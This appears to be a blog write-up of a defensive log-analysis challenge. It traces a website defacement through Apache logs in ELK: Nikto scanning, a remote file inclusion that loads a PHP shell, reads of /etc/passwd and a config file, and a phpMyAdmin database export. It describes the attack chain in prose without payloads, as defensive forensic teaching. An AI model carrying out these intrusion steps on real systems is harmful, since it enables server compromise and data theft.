September 5, 2024
In this challenge, we’ve been tasked with analyzing Apache logs to uncover what an attacker did before defacing the victim’s website. We’re given access to an ELK instance to perform our investigation.
Mike is a young entrepreneur that recently started a pharmaceutical company online that supplies personal health products. As the business is growing at a rapid pace, Mike pressured the developers to create a website as quickly as possible and disregarded time-consuming security measures. Unsurprisingly, after the website went live it was defaced by a threat actor that also stole all the database records. Learning from this incident Mike took down the server and began security testing and investigation. He setup a forwarder to send server logs to a SIEM and used a file integrity monitoring solution to get alerts when files are modified on the server. You are provided with the alerts generated from the file integrity monitoring tool, stored on the Desktop as FIM1.JPG and FIM2.JPG. You also have screenshots of the website homepage before and after the compromise, saved as; Before.JPG and After.JPG.
As an analyst, you need to submit details to the CTI team. What is the signature left by the threat actor that compromised the website?
We’ve been provided with screenshots of the site before and after it was defaced.
The defaced webpage features the threat actor’s signature.
The attacker deleted some files. What are they? (Alphabetical order based on filename)
Aside from the screenshots of the website, we’ve also been provided with screenshots of the FIM (File Integrity Monitor).
Checking these screenshots we can see the two files that were deleted.
What is the scanner used by the attacker to identify the vulnerability?
Our briefing instructed us to frame our hunt between the dates of Feb 17th and Feb 19th, 2021, so we’ll start by restricting events to be within this timeframe.
We’re looking for attacker activity so we’ll begin by analyzing POST requests for any suspicious activity.
Sorting events from oldest to newest helps us to get a clear picture of the activities performed by the attacker.
After scrolling through a little bit of noise we can see what appears to be the attacker’s first attempt at testing for vulnerabilities.
This doesn’t tell us what tool the attacker is using though, so we’ll drop our POST request filter and start looking at more data.
Unfortunately, our logs don’t include User-Agents, which makes identifying the tool a bit more complicated.
We can start by searching for well-known tools in the data to see if we get lucky.
There don’t seem to be any results for Nmap, but Nikto pops up 50 hits.
Which PHP page is vulnerable to Remote File Inclusion (RFI)?
To look for an RFI attack we’re going to be expecting to find a full URL within the request.
To filter for this we’ll search for any requests that contain https.
Unfortunately, so far our results are not what we’re looking for. Most of these results aren’t RFI attempts at all.
We can filter further for successful responses (response code 200) or scroll through the results.
What is the IP address of the remote attacker?(3 points)
We discovered this in Q3 when we found evidence of XSS testing.
What is the name of the PHP shell?
We’ll adjust our filter now for the endpoint that is vulnerable to RFI (getimagesonly).
After adjusting our query it becomes clear that the attacker downloaded a shell from mediafire.com.
The attacker downloaded the PHP shell from a file-hosting website. What is the name of the website?
We discovered this in the previous question.
What time was the first command executed through the PHP shell?(3 points)
Again we’ll adjust our query, this time we will filter for requests to the backdoor file.
Note: The answer expected is not the timestamp of the log entry but rather the timestamp within the message field of the log.
Which config file does the attacker attempt to read using the command ‘cat’?
We can keep our existing filters and read through the various commands executed by the attacker.
Shortly after running the command in Q8, we can see the attacker read the passwd file, ran pwd, and enumerated /opt/lampp/htdocs before reading a config file with cat.
At what time was the database dumped by the attacker?
The database doesn’t seem to be dumped via the backdoor, so we’ll remove that from our filters.
We’ll also adjust our timeframe for anything after the backdoor was uploaded (or there about).
Scrolling through the results we can see the attacker accessed phpmyadmin, which is often targeted by attackers.
Shortly after accessing phpmyadmin, we see a reference to phpmyadmin/db_structure.php, and, not long after that, we see the attacker access db_export.php.
The attacker exfiltrated the database records. What is the database name? (Just the name, without any extension)
We can see the name of the database in the query discussed in the previous question.
Previous post
Next post